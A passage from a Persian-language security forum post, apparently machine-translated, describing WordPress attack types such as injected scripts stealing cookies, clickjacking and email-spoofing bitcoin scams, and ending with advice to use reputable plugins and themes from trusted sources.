                  بنابراین یک هکر می تواند با توجه به خواسته های خود ، صفحه وب را تغییر داده ، اطلاعات مربوط به کوکی ها را بدزدد ، به او اجازه دهد تا به دلیل خواسته خود سایتها را برای بازیابی اطلاعات حساس یا تزریق کد مخربی که متعاقباً اجرا می شود ، ربود.

                  کلیک کردن
                  کلیک کردن (یا "ربودن کلیک") یک روش مخرب است. در این روش ، مهاجم با قرار دادن یک پیوند (شفاف یا مات) با دانستن اینکه روی آن کلیک خواهید کرد ، یک دکمه ، یک پیوند یا یک تصویر را ربود. هدف این نوع حمله این است که به جای اینکه به شما اجازه دهد روی هدف مورد نظر صفحه وب کلیک کنید ، روی پیوند نامرئی کلیک کنید.

                  در نتیجه ، مهاجم می تواند دستورات خطرناک را اجرا کند یا به اطلاعات محرمانه دسترسی پیدا کند. کاربران Plesk هنگام باز شدن Plesk در iframes در سایت های مخرب می توانند قربانی کلیک کردن شوند.

                  کلاهبرداری
                  آیا ایمیل عجیب و غریب از یکی از اقوام (یا حتی ایمیلی از طرف خودتان) دریافت کرده اید؟ بدون فکر کردن 520 دلار بیت کوین به حساب ناشناخته پرداخت نکنید: مطمئناً شما قربانی کلاهبرداری هستید. این یک روش جعل آدرس ایمیل ارسال است.

                  این نوع حمله بسیار رایج است (و گاهی معتبر). معمولاً هکر سعی می کند چیزهایی را باور کند که در واقع کاملاً اشتباه است: او اطلاعاتی در مورد شما دارد ، عزیزی به شما احتیاج دارد و غیره.

                  هک وردپرس - نکات پیشگیرانه
                  برای جلوگیری از آلوده شدن سایت شما و اینکه بتوانید از آن در برابر این نوع حملات محافظت کنید ، توصیه می شود از افزونه ها و موضوعاتی که شهرت خوبی دارند استفاده کنید. راه حل هایی وجود دارد که قبلاً توسط کاربران انجمن وردپرس آزمایش شده است . حتما از سایت های مورد اطمینان پلاگین ، پوسته و هسته وردپرس را دریافت کنید .
                  -----------------------------SAFE MASTER---------------------------
                  تاپیک هکر های تازه وارد

                  نظر

                  قبلی template بعدی
                  صبر کنید ..
                  X